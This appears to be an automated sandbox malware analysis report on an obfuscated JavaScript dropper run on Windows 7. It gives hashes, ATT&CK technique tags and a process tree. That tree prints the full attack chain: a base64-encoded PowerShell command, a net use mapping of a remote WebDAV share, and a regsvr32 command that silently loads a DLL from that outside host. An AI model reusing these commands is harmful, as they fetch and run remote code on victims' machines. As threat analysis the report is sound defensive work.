4676a461f22cff73e63a21972b30706966ef2cafd042b844943894c60f09b9df

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
25-07-2024 23:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

275393221435413349.js
Size

18KB
MD5

403d8a30f4da14670e5164dd973efa66
SHA1

18bbf9fb9b574404ef3a1776cc3f46693e7a067a
SHA256

4676a461f22cff73e63a21972b30706966ef2cafd042b844943894c60f09b9df
SHA512

38b8616f231dcbdcf722112f3d9280c71acc5aaac7c4f13e35e32a033638e26cf37de2b910effeb8a3a373722b946ffa94205b46f76699aa07231eca937fd2c5
SSDEEP

192:8HYWBqToCZuwObq5gq3yiDqcdFYlX4X9iDqcdFYlXCxzutiC:KYWoT3Z5oq+q39DXkxDXkC4tp

Score

6^/10

defense_evasion execution

Malware Config

Signatures

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2416	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2416	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2184 wrote to memory of 2416	2184	wscript.exe	30
PID 2184 wrote to memory of 2416	2184	wscript.exe	30
PID 2184 wrote to memory of 2416	2184	wscript.exe	30
PID 2416 wrote to memory of 2920	2416	powershell.exe	32
PID 2416 wrote to memory of 2920	2416	powershell.exe	32
PID 2416 wrote to memory of 2920	2416	powershell.exe	32
PID 2416 wrote to memory of 2208	2416	powershell.exe	33
PID 2416 wrote to memory of 2208	2416	powershell.exe	33
PID 2416 wrote to memory of 2208	2416	powershell.exe	33
PID 2416 wrote to memory of 2208	2416	powershell.exe	33
PID 2416 wrote to memory of 2208	2416	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\275393221435413349.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADQANwA4ADUAMgA1ADcAMwA1ADUANAA5ADUALgBkAGwAbAA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\
    3⤵
    PID:2920
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\4785257355495.dll
    3⤵
    PID:2208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2416-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

Filesize
4KB

Download
memory/2416-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2416-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2416-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2416-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2416-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2416-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2416-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2416-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download